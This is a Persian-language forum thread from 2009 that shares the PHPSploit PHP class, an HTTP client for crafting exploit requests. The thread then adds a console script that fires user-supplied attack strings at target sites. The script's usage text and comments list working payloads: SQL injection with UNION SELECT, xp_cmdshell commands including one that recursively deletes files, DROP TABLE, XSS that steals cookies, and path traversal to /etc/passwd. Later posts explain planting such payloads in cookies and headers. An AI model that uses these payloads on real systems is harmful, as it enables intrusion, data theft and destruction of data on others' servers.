کلاس PHPSploit - ایمن سازی

Y.P.Y · Mar 6, 2009

کلاس PHPSploit - برای تست و ایمن سازی نرم افزار(سطح حرفه ای):
توضیحات و کاربردش واضحه:

کد:

Implementing a web user agent.
َAdd cookies, headers, proxy server with/without authentification.
Supports the Get & Post method.
Simple browser with the cookiejar() & allowredirection() function.
Return the content/headers of the request.

http://mgsdl.free.fr/?2:3

PHP:

<?php

/*
* 
* Copyright (C) darkfig
* 
* This program is free software; you can redistribute it and/or 
* modify it under the terms of the GNU General Public License 
* as published by the Free Software Foundation; either version 2 
* of the License, or (at your option) any later version. 
* 
* This program is distributed in the hope that it will be useful, 
* but WITHOUT ANY WARRANTY; without even the implied warranty of 
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
* GNU General Public License for more details. 
* 
* You should have received a copy of the GNU General Public License 
* along with this program; if not, write to the Free Software 
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
* 
* TITLE:          PhpSploit Class
* REQUIREMENTS:   PHP 4 / PHP 5
* VERSION:        2.1
* LICENSE:        GNU General Public License
* ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
* FILENAME:       phpsploitclass.php
*
* CONTACT:        [email protected] (french / english)
* GREETZ:         Sparah, Ddx39
*
* DESCRIPTION:
* The phpsploit is a class implementing a web user agent.
* You can add cookies, headers, use a proxy server with (or without) a
* basic authentification. It supports the GET and the POST method. It can
* also be used like a browser with the cookiejar() function (which allow
* a server to add several cookies for the next requests) and the
* allowredirection() function (which allow the script to follow all
* redirections sent by the server). It can return the content (or the
* headers) of the request. Others useful functions can be used for debugging.
* A manual is actually in development but to know how to use it, you can
* read the comments.
*
* CHANGELOG:
*
* [2008-08-29] (2.1)
*  * New: The showheader()/showcookie() functions can now return an array
*  * Bug #3 fixed: Problem concerning some servers for the main function
*
* [2007-06-10] (2.0)
*  * Code: Code optimization
*  * New: Compatible with PHP 4 by default
*
* [2007-01-24] (1.2)
*  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
*  * New: multipart/form-data enctype is now supported 
*
* [2006-12-31] (1.1)
*  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
*  * New: You can now call the getheader() / getcontent() function without parameters
*
* [2006-12-30] (1.0)
*  * First version
* 
*/

class phpsploit
{
var $proxyhost;
var $proxyport;
var $host;
var $path;
var $port;
var $method;
var $url;
var $packet;
var $proxyuser;
var $proxypass;
var $header;
var $cookie;
var $data;
var $boundary;
var $allowredirection;
var $last_redirection;
var $cookiejar;
var $recv;
var $cookie_str;
var $header_str;
var $server_content;
var $server_header;


/**
 * This function is called by the
 * get()/post()/formdata() functions.
 * You don't have to call it, this is
 * the main function.
 *
 * @access private
 * @return string $this->recv ServerResponse
 * 
 */
function sock()
{
	if(!empty($this->proxyhost) && !empty($this->proxyport))
	   $socket = @fsockopen($this->proxyhost,$this->proxyport);
	else
	   $socket = @fsockopen($this->host,$this->port);

	if(!$socket)
	   die("Error: Host seems down");
	
	if($this->method=='get')
	   $this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
	   
	elseif($this->method=='post' or $this->method=='formdata')
	   $this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
	   
	else
	   die("Error: Invalid method");
	
	if(!empty($this->proxyuser))
	   $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
	
	if(!empty($this->header))
	   $this->packet .= $this->showheader();
	   
	if(!empty($this->cookie))
	   $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";

	$this->packet .= 'Host: '.$this->host."\r\n";
	$this->packet .= "Connection: Close\r\n";
	
	if($this->method=='post')
	{
		$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
		$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
		$this->packet .= $this->data."\r\n";
	}
	elseif($this->method=='formdata')
	{
		$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
		$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
		$this->packet .= $this->data;
	}

	$this->packet .= "\r\n";
	$this->recv = '';

	fputs($socket, $this->packet);

	while(!feof($socket))
	   $this->recv .= fgets($socket);

	fclose($socket);

	if($this->cookiejar)
	   $this->getcookie();

	if($this->allowredirection)
	   return $this->getredirection();
	else
	   return $this->recv;
}


/**
 * This function allows you to add several
 * cookies in the request.
 * 
 * @access  public
 * @param   string cookn CookieName
 * @param   string cookv CookieValue
 * @example $this->addcookie('name','value')
 * 
 */
function addcookie($cookn,$cookv)
{
	if(!isset($this->cookie))
	   $this->cookie = array();

	$this->cookie[$cookn] = $cookv;
}


/**
 * This function allows you to add several
 * headers in the request.
 *
 * @access  public
 * @param   string headern HeaderName
 * @param   string headervalue Headervalue
 * @example $this->addheader('Client-IP', '128.5.2.3')
 * 
 */
function addheader($headern,$headervalue)
{
	if(!isset($this->header))
	   $this->header = array();
	   
	$this->header[$headern] = $headervalue;
}

/**
 * This function allows you to use an
 * http proxy server. Several methods
 * are supported.
 * 
 * @access  public
 * @param   string proxy ProxyHost
 * @param   integer proxyp ProxyPort
 * @example $this->proxy('localhost',8118)
 * @example $this->proxy('localhost:8118')
 * 
 */
function proxy($proxy,$proxyp='')
{
	if(empty($proxyp))
	{
		$proxarr = explode(':',$proxy);
		$this->proxyhost = $proxarr[0];
		$this->proxyport = (int)$proxarr[1];
	}
	else 
	{
		$this->proxyhost = $proxy;
		$this->proxyport = (int)$proxyp;
	}

	if($this->proxyport > 65535)
	   die("Error: Invalid port number");
}


/**
 * This function allows you to use an
 * http proxy server which requires a
 * basic authentification. Several
 * methods are supported:
 *
 * @access  public
 * @param   string proxyauth ProxyUser
 * @param   string proxypass ProxyPass
 * @example $this->proxyauth('user','pwd')
 * @example $this->proxyauth('user:pwd');
 * 
 */
function proxyauth($proxyauth,$proxypass='')
{
	if(empty($proxypass))
	{
		$posvirg = strpos($proxyauth,':');
		$this->proxyuser = substr($proxyauth,0,$posvirg);
		$this->proxypass = substr($proxyauth,$posvirg+1);
	}
	else
	{
		$this->proxyuser = $proxyauth;
		$this->proxypass = $proxypass;
	}
}


/**
 * This function allows you to set
 * the 'User-Agent' header.
 * 
 * @access  public
 * @param   string useragent Agent
 * @example $this->agent('Firefox')
 * 
 */
function agent($useragent)
{
	$this->addheader('User-Agent',$useragent);
}


/**
 * This function returns the headers
 * which will be in the next request.
 * 
 * @access  public
 * @return  string $this->header_str Headers
 * @return  array  $this->head Headers
 * @example $this->showheader()
 * @example $this->showheader(1)
 * 
 */
function showheader($array='')
{
	$this->header_str = '';
	
	if(!isset($this->header))
	   return;
	   
	if(!empty($array))
		return $this->header;
		
	foreach($this->header as $name => $value)
	   $this->header_str .= $name.': '.$value."\r\n";
	   
	return $this->header_str;
}


/**
 * This function returns the cookies
 * which will be in the next request.
 * 
 * @access  public
 * @return  string $this->cookie_str Cookies
 * @return  array  $this->cookie Cookies
 * @example $this->showcookie()
 * @example $this->showcookie(1)
 * 
 */
function showcookie($array='')
{
	if(!isset($this->cookie))
	   return;
	 
	if(!empty($array))
		return $this->cookie;
	
	$this->cookie_str = '';
	
	foreach($this->cookie as $name => $value)
	   $this->cookie_str .= $name.'='.$value.'; ';

	return $this->cookie_str;
}


/**
 * This function returns the last
 * formed http request.
 * 
 * @access  public
 * @return  string $this->packet HttpPacket
 * @example $this->showlastrequest()
 * 
 */
function showlastrequest()
{
	if(!isset($this->packet))
	   return;
	else
	   return $this->packet;
}


/**
 * This function sends the formed
 * http packet with the GET method.
 * 
 * @access  public
 * @param   string url Url
 * @return  string $this->sock()
 * @example $this->get('localhost/index.php?var=x')
 * @example $this->get('http://localhost:88/tst.php')
 * 
 */
function get($url)
{
	$this->target($url);
	$this->method = 'get';
	return $this->sock();
}


/**
 * This function sends the formed
 * http packet with the POST method.
 *
 * @access  public
 * @param   string url  Url
 * @param   string data PostData
 * @return  string $this->sock()
 * @example $this->post('http://localhost/','helo=x')
 * 
 */	
function post($url,$data)
{
	$this->target($url);
	$this->method = 'post';
	$this->data = $data;
	return $this->sock();
}


/**
 * This function sends the formed http
 * packet with the POST method using
 * the multipart/form-data enctype.
 * 
 * @access  public
 * @param   array array FormDataArray
 * @return  string $this->sock()
 * @example $formdata = array(
 *                      frmdt_url => 'http://localhost/upload.php',
 *                      frmdt_boundary => '123456', # Optional
 *                      'var' => 'example',
 *                      'file' => array(
 *                                frmdt_type => 'image/gif',  # Optional
 *                                frmdt_transfert => 'binary' # Optional
 *                                frmdt_filename => 'hello.php,
 *                                frmdt_content => '<?php echo 1; ?>'));
 *          $this->formdata($formdata);
 * 
 */
function formdata($array)
{
	$this->target($array[frmdt_url]);
	$this->method = 'formdata';
	$this->data = '';
	
	if(!isset($array[frmdt_boundary]))
	   $this->boundary = 'phpsploit';
	else
	   $this->boundary = $array[frmdt_boundary];

	foreach($array as $key => $value)
	{
		if(!preg_match('#^frmdt_(boundary|url)#',$key))
		{
			$this->data .= str_repeat('-',29).$this->boundary."\r\n";
			$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
			
			if(!is_array($value))
			{
				$this->data .= "\r\n\r\n".$value."\r\n";
			}
			else
			{
				$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";

				if(isset($array[$key][frmdt_type]))
				   $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";

				if(isset($array[$key][frmdt_transfert]))
				   $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";

				$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
			}
		}
	}

	$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
	return $this->sock();
}


/**
 * This function returns the content
 * of the server response, without
 * the headers.
 * 
 * @access  public
 * @param   string code ServerResponse
 * @return  string $this->server_content
 * @example $this->getcontent()
 * @example $this->getcontent($this->get('http://localhost/'))
 * 
 */
function getcontent($code='')
{
	if(empty($code))
	   $code = $this->recv;

	$code = explode("\r\n\r\n",$code);
	$this->server_content = '';
	
	for($i=1;$i<count($code);$i++)
	   $this->server_content .= $code[$i];

	return $this->server_content;
}


/**
 * This function returns the headers
 * of the server response, without
 * the content.
 * 
 * @access  public
 * @param   string code ServerResponse
 * @return  string $this->server_header
 * @example $this->getcontent()
 * @example $this->getcontent($this->post('http://localhost/','1=2'))
 * 
 */
function getheader($code='')
{
	if(empty($code))
	   $code = $this->recv;

	$code = explode("\r\n\r\n",$code);
	$this->server_header = $code[0];
	
	return $this->server_header;
}


/**
 * This function is called by the
 * cookiejar() function. It adds the
 * value of the "Set-Cookie" header
 * in the "Cookie" header for the
 * next request. You don't have to
 * call it.
 * 
 * @access private
 * @param  string code ServerResponse
 * 
 */
function getcookie()
{
	foreach(explode("\r\n",$this->getheader()) as $header)
	{
		if(preg_match('/set-cookie/i',$header))
		{
			$fequal = strpos($header,'=');
			$fvirgu = strpos($header,';');
			
			// 12=strlen('set-cookie: ')
			$cname  = substr($header,12,$fequal-12);
			$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
			
			$this->cookie[trim($cname)] = trim($cvalu);
		}
	}
}


/**
 * This function is called by the
 * get()/post() functions. You
 * don't have to call it.
 *
 * @access  private
 * @param   string urltarg Url
 * @example $this->target('http://localhost/')
 * 
 */
function target($urltarg)
{
	if(!ereg('^http://',$urltarg))
	   $urltarg = 'http://'.$urltarg;
	
	$urlarr = parse_url($urltarg);
	
	if(!isset($urlarr['path']) || empty($urlarr['path']))
	   die("Error: No path precised");
	
	$this->url  = $urlarr['path'];
	
	if(isset($urlarr['query']))
	   $this->url .= '?'.$urlarr['query'];
	
	$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
	$this->host = $urlarr['host'];
	
	if($this->port != '80')
	   $this->host .= ':'.$this->port;

	$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
	
	if($this->port > 65535)
	   die("Error: Invalid port number");
}


/**
 * If you call this function,
 * the script will extract all
 * 'Set-Cookie' headers values
 * and it will automatically add
 * them into the 'Cookie' header
 * for all next requests.
 *
 * @access  public
 * @param   integer code 1(enabled) 0(disabled)
 * @example $this->cookiejar(0)
 * @example $this->cookiejar(1)
 * 
 */
function cookiejar($code)
{
	if($code=='0')
	   $this->cookiejar=FALSE;

	elseif($code=='1')
	   $this->cookiejar=TRUE;
}


/**
 * If you call this function,
 * the script will follow all
 * redirections sent by the server.
 * 
 * @access  public
 * @param   integer code 1(enabled) 0(disabled)
 * @example $this->allowredirection(0)
 * @example $this->allowredirection(1)
 * 
 */
function allowredirection($code)
{
	if($code=='0')
	   $this->allowredirection=FALSE;
	   
	elseif($code=='1')
	   $this->allowredirection=TRUE;
}


/**
 * This function is called if
 * allowredirection() is enabled.
 * You don't have to call it.
 *
 * @access private
 * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
 * @return string $this->get($this->last_redirection)
 * @return string $this->recv;
 * 
 */
function getredirection()
{
	if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
	{
		$this->last_redirection = trim($codearr[2]);
		
		if(!ereg('://',$this->last_redirection))
		   return $this->get('http://'.$this->host.$this->path.$this->last_redirection);

		else
		   return $this->get($this->last_redirection);
	}
	else
	   return $this->recv;
}


/**
 * This function allows you
 * to reset some parameters.
 * 
 * @access  public
 * @param   string func Param
 * @example $this->reset('header')
 * @example $this->reset('cookie')
 * @example $this->reset()
 * 
 */
function reset($func='')
{
	switch($func)
	{
		case 'header':
		$this->header = array();
		break;
			
		case 'cookie':
		$this->cookie = array();
		break;
			
		default:
		$this->cookiejar = '';
		$this->header = array();
		$this->cookie = array();
		$this->allowredirection = '';
		break;
	};
}
};
?>

X7337X · Mar 6, 2009

اون وقت چطور باید استفاده کنیم؟

Y.P.Y · Mar 6, 2009

سلام،
عزیز بدرد شما نمی خوره(به کاره تون نمیاد)...
باید بلد باشید Exploit/Packet بنویسید.
:rose:

X7337X · Mar 6, 2009

راست میگی شاید کار نکردی بلد نیستی توضیح بدی. با گفتن Exploit/Packet که نمیشه گفت آدم برنامه نویسه
اگه 20min تحقیق کنی به راحتی جواب میدی ولی دیگه نیازی نیست :rose:

Y.P.Y · Mar 6, 2009

راست میگی شاید کار نکردی بلد نیستی توضیح بدی. با گفتن exploit/packet که نمیشه گفت آدم برنامه نویسه
اگه 20min تحقیق کنی به راحتی جواب میدی ولی دیگه نیازی نیست

مرسی، انتظار دارید C و Assembly بهتون یاد بدم؟!
شما از جایه دیگه پر هستید یا کینه گرفتید و در تمام پستهام بهم می توپید!
مواظب صحبتهاتون باشید!!

X7337X · Mar 6, 2009

doste aziz bande ghasde jesarat nadaram
lotf konid posti ke ersal mikonid ba tozihe kamel bashe

yakoza · Mar 6, 2009

دوست عزيز x7337x لطف كنيد فينگليش ننويسيد

راست میگی شاید کار نکردی بلد نیستی توضیح بدی. با گفتن exploit/packet که نمیشه گفت آدم برنامه نویسه
اگه 20min تحقیق کنی به راحتی جواب میدی ولی دیگه نیازی نیست

در ضمن توهين به كاربرا خلاف قوانينه ، لطفا مراعات كنيد

سلام،
عزیز بدرد شما نمی خوره(به کاره تون نمیاد)...
باید بلد باشید exploit/packet بنویسید.

بد نيست شما هم يه توضيح مختصر بدي ، همه كه اندازه شما اطلاعات ندارن

مرسي

justpersian · Mar 7, 2009

سلام،
عزیز بدرد شما نمی خوره(به کاره تون نمیاد)...
باید بلد باشید Exploit/Packet بنویسید.

واقعا این یعنی چی ؟
شما می تونی حد اقل یک خط توضیح بدی تا طرف ببینه که به کارش میاد یا نه !!!
-------------------------------------
تعریف کلی Exploit
Exploit در واقع یک سورس از برنامه است که توسط باگ های برنامه توسط یک برنامه نویس C ، perl ، php و Payton نوشته میشه !
حالا اگه این کد کامل کامپایل بشه شما یکی از کارهایی که می تونید انجام بدید اینه که به صورت راه دور یا remote کامپیوترهای دیگران رو مدیریت کنی و بهشون وصل بشی
اینایی که گفتم کلیش بود
اینم یه نمونه از یک php exploit
http://packetstormsecurity.nl/web/php.hidden-vars.txt

Y.P.Y · Mar 7, 2009

سلام،
Exploit/Sploit: یک کلمه فرانسوی هستش که در علوم کامپیوتری/برنامه نویسی به تکه نرم افزار/داده میگن که معمولاً برای استفاده/سو استفاده از Bug ها، اشکالات، و حفره(آسیب) های موجود در نرم افزار یا سخت افزار با اهداف مختلفی بکاربرده میشه. که این عمل سبب ایجاد واکنش نسبت به اعمال این تکه نرم افزار/داده می شه. این واکنش شرایطی مثل: کنترل یا عدم کنترل، UDA, ACE, EOP، Bumping, Bypass, Backtracking, Overrun/Overflow و DOS... رو ایجاد میکنه.
...
Yakoza جان تمام پست هارو به غیر از این و کلاس PHPSploit رو حذف کنید.
تشکر.

web2 · Mar 7, 2009

آیا برای استفاده از این کلاس باید حتما در وب سایتی باگ یا حفره ای پیدا کنیم یا اینکه خودش پیدا می کنه؟
دوم : شما از این برنامه استفاده کردین؟
البته من سورس رو بررسی نکردم ولی به نظر خیلی جالب می آد

Y.P.Y · Mar 7, 2009

آیا برای استفاده از این کلاس باید حتما در وب سایتی باگ یا حفره ای پیدا کنیم یا اینکه خودش پیدا می کنه؟
دوم : شما از این برنامه استفاده کردین؟
البته من سورس رو بررسی نکردم ولی به نظر خیلی جالب می آد.

این کلاس اسکنر نیست، خودتون باید ضعفها/آسیب ها رو پیدا کنید.
آره عزیز...
امکانات و کارایی هاش رو نوشتم/نوشته:

کد:

Implementing a web user agent.
َAdd cookies, headers, proxy server with/without authentification.
Supports the Get & Post method.
Simple browser with the cookiejar() & allowredirection() function.
Return the content/headers of the request.

Y.P.Y · Mar 7, 2009

...

نمونه ساده استفاده از کلاس PHPSploit تحت Console:
این مثال، آدرس/دامنه و نام فایل و دستورات رو از ورودی میگیره و اجرا میکنه. خروجی رو هم بصورت ساده بررسی میکنه(برای اعمال مکرر از for/loop استفاده کنید).
با متد Get:

PHP:

<?php
@error_reporting(E_ALL ^ E_NOTICE);

require("./phpsploit.php");

if($argc < 4)
{
function _Main()
{
print("[!] Name/Title: PHPSploit test.
[!] Usage: php test.php <Domain/URL> <FileName> <Command> <Options>
[!] <FileName>: index.asp index.aspx index.php comment.asp page.php OR...
[!] <Domain/URL>: http://localhost/ OR http://localhost/weblog/ OR...
[!] <Command>: select * from sysusers
               --
               /*
               exec master..xp_cmdshell 'net+users'
               ' union select all
               config[VARIABLE]
               \'; desc TABLENAME;
               <script>alert(document.cookie)</script>
               ../../../.into TABLENAME value(xxxxx)
               exec master..xp cmdshell 'dir C:\'
			exec master..xp cmdshell 'del *.* /a /f /s /q'
               ;drop table TABLENAME
[!] Options: <ProxyHost:ProxyPort> <ProxyUsername:ProxyPassword>
[!] Example: php test.php http://localhost/ target.php Command=MkDir%20TestFolder");
#[!] Example1: php test.php http://domain/forums/ post_thanks.php do=post_thanks_add&u=--
#[!] Example3: php test.php http://forums.domain/ post_thanks.php do=post_thanks_add&u=--
#[!] Example4: php test.php http://localhost/ page.php url=../../../../../../../../../../../../etc/passwd%00
#[!] Example4: php test.php http://localhost/ language.php name=../../../../../../../../../../../../etc/passwd%00
#[!] Example5: php test.php http://localhost/ page.aspx title=<script>alert(document.cookie)<script>
#[!] Example6: php test.php http://localhost/ view.asp id=-1'%20exec%20master..xp%20cmdshell%20'dir C:\'
#[!] Example7: php test.php http://localhost/ config.asp id=-1'%20union%20select%20all
#[!] Example8: php test.php http://localhost/ config.php id=-9999%20union%20all%20select%20null, concat(FIELDNAME, 0x20, FIELDNAME), null%20 from%20TABLENAME
#[!] Example9: ...
@exit(0);
}
};

if(trim($argv[1]) == '' || trim($argv[2]) == ''): _Main();
endif;
$_Str_DomainOrURL= (string)$argv[1];
$_Str_FileName= (string)$argv[2];
$_Str_Command= (string)$argv[3];
$_Str_ProxyHost= (string)$argv[4];
$_Str_ProxyAuthentification= (string)$argv[4];
print("[*] Creating PHPSploit object... ");
$_Obj_PHPSploit= new phpsploit() or @exit('Error.');
print("Done.\n[*] Preparing information... ");
$_Obj_PHPSploit->agent('Mozilla Firefox');#$_Obj_PHPSploit->agent('Microsopht PhireLamb IIS .Net lame');
$_Obj_PHPSploit->allowredirection(0);#$_Obj_PHPSploit->allowredirection(1);
$_Obj_PHPSploit->cookiejar(0);#$_Obj_PHPSploit->cookiejar(1);
if($_Str_ProxyHost): $_Obj_PHPSploit->proxy($_Str_ProxyHost);
endif;
if($_Str_ProxyAuthentification): $_Obj_PHPSploit->proxyauth($_Str_ProxyAuthentification);
endif;
print("Done.\n[*] Sending request/Excuting command(Get)... ");
$_Str_ContentOrResponse= $_Obj_PHPSploit->getcontent($_Obj_PHPSploit->get($_Str_DomainOrURL . $_Str_FileName . '?' . $_Str_Command));

if(strstr(strtolower($_Str_ContentOrResponse), 'fatal error') || strstr(strtolower($_Str_ContentOrResponse), 'parse error') || strstr(strtolower($_Str_ContentOrResponse), 'database error') || strstr(strtolower($_Str_ContentOrResponse), 'engine error')  || strstr(strtolower($_Str_ContentOrResponse), 'syntax error')): print("\n[+] Command successfuly excuted.");
else: print("Done.\n");
endif;

unset($_Str_DomainOrURL, $_Str_FileName, $_Str_Command, $_Str_ProxyHost, $_Str_ProxyAuthentification, $_Str_ContentOrResponse);
@exit(0);
?>

از این کلاس PHPSploit برای زبانهای دیگه مثل ASP PERL Ruby ASPx و... هم می تونید استفاده کنید!
به غیر از این Command های ساده میتونید یک Packet(با هر سایز و طول) که شامل: کدهای مخرب/Exploit یا دستورات SQL یا... دلخواهتون هست رو هدف اجرا کنید.
همچنین میتونید بکمک توابع addheader و addcookie هدر و کوکی ارسالی رو تنظیم و دستکاری کنید(مثلاً مقدار کوکی رو برابر -- یا <SCRIPTs>... یا دستورات SQL... قرار بدید و بعد Execute کنید).
از تابع formdata هم می تونید برای کار/دستکاری فرم ها استفاده کنید.
توضیحات کامل داده شد.
موفق باشید.